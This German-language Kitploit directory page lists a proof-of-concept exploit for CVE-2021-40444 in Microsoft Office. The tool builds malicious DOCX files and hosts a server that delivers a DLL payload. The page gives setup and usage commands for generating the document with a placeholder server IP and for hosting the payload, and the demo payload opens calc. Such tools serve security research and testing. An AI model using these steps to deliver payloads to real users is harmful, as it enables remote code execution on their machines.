Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-40444 — Erstellt bösartige DOCX-Dokumente, die CVE-2021-40444 (Microsoft Office RCE) ausnutzen, mit einem gehosteten Server für die DLL-Payload-Zustellung, basierend auf rückentwickelten In-the-Wild-Beispielen. | Kitploit
Tools/GitHubGitHub/lockedbyte/cve-2021-40444
Payload-GenerierungExploitationWebanwendungs-ExploitationMalware-Analyse
GitHublockedbyte/cve-2021-40444

CVE-2021-40444

Erstellt bösartige DOCX-Dokumente, die CVE-2021-40444 (Microsoft Office RCE) ausnutzen, mit einem gehosteten Server für die DLL-Payload-Zustellung, basierend auf rückentwickelten In-the-Wild-Beispielen.

Repository anzeigen
1.8k475vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-40444 PoC

Böswilliger docx-Generator zur Ausnutzung von CVE-2021-40444 (Microsoft Office Word Remote Code Execution)

Die Erstellung dieses Skripts basiert auf Reverse Engineering der in freier Wildbahn verwendeten Probe: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)

Sie müssen zuerst lcab installieren (sudo apt-get install lcab)

Überprüfen Sie REPRODUCE.md für manuelle Reproduktionsschritte

Wenn Ihre generierte cab nicht funktioniert, versuchen Sie, die exploit.html-URL auf calc.cab zu verweisen

Verwendung

Generieren Sie zuerst ein bösartiges docx-Dokument mit einer DLL. Sie können die unter test/calc.dll verwenden, die lediglich einen calc.exe durch einen Aufruf von system() öffnet

python3 exploit.py generate test/calc.dll http://<SRV IP>

Document generation

Sobald Sie das bösartige docx generiert haben (wird in out/ sein), können Sie den Server einrichten:

sudo python3 exploit.py host 80

Server

Versuchen Sie abschließend das docx in einer Windows-Virtual-Maschine:

Pop Calc

Tool herunterladen